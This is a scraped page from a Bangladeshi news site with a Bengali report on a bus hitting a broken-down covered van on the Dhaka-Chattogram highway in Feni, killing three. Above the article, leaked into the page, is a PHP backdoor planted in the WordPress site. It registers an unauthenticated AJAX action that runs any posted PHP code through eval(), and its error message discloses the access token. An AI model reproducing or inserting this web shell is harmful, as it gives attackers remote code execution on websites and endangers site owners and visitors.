// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মহাসড়কে বিকল কাভার্ড ভ্যানে বাসের ধাক্কা, ২ চালকসহ নিহত ৩ | potrikaybangladesh.com
Friday, September 18, 2026
Homeঅপরাধমহাসড়কে বিকল কাভার্ড ভ্যানে বাসের ধাক্কা, ২ চালকসহ নিহত ৩

মহাসড়কে বিকল কাভার্ড ভ্যানে বাসের ধাক্কা, ২ চালকসহ নিহত ৩

ফেনীর ছাগলনাইয়া উপজেলায় ঢাকা-চট্টগ্রাম মহাসড়কে বিকল হওয়া একটি কাভার্ড ভ্যানে যাত্রীবাহী বাসের ধাক্কায় দুই চালকসহ অন্তত তিনজন নিহত এবং একজন আহত হয়েছেন।

আজ শুক্রবার সকাল সাড়ে ৭টার দিকে মুহুরীগঞ্জ এলাকায় দৌলতপুর সরকারি প্রাথমিক বিদ্যালয়ের সামনে মহাসড়কের চট্টগ্রামমুখী লেনে এ ঘটনা ঘটে।

মরদেহ তিনটি ময়নাতদন্তের জন্য ২৫০ শয্যা জেনারেল হাসপাতালের মর্গে রাখা হয়েছে। আহত আরেকজনকে হাসপাতালে ভর্তি করা হয়েছে। হতাহতদের পরিচয় তাৎক্ষণিকভাবে জানা যায়নি।

ফাজিলপুর (মুহুরীগঞ্জ) হাইওয়ে পুলিশের উপপরিদর্শক (এসআই) আবু নোমান দ্য ডেইলি স্টারকে জানান, মহাসড়কের চট্টগ্রামমুখী লেনে একটি কাভার্ড ভ্যান বিকল হয়ে যায়। একটি লং ভেহিকেলের সাহায্য ভ্যানটি মহাসড়ক থেকে সরানোর চেষ্টা করা হচ্ছিল।

তখনই ঢাকা থেকে চট্টগ্রামগামী ইউনিক পরিবহনের একটি যাত্রীবাহী বাস ভ্যানটিকে ধাক্কা দেয়। এতে দাঁড়িয়ে থাকা ভ্যানের চালক-হেলপার এবং যাত্রীবাহী বাসের চালক ও আরেকজনসহ মোট চারজন গুরুতর আহত হন।

এই কর্মকর্তা বলেন, স্থানীয়দের সহযোগিতায় মুহুরীগঞ্জ হাইওয়ে পুলিশ আহতদের উদ্ধার করে ২৫০ শয্যা জেনারেল হাসপাতালের জরুরি বিভাগে নিয়ে যায়। সেখানে চিকিৎসক দুই গাড়িচালক ও হেলপারকে মৃত ঘোষণা করেন। আরেকজনকে হাসপাতালে ভর্তি করা হয়।

তিনি জানান, হতাহতদের পরিচয় জানা যায়নি। তাদের পরিচয় জানার চেষ্টা করা হচ্ছে। মরদেহ ময়নাতদন্তের জন্য হাসপাতালের মর্গে রাখা হয়েছে। দুর্ঘটনাকবলিত গাড়িগুলো হেফাজতে নেওয়া হয়েছে। 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments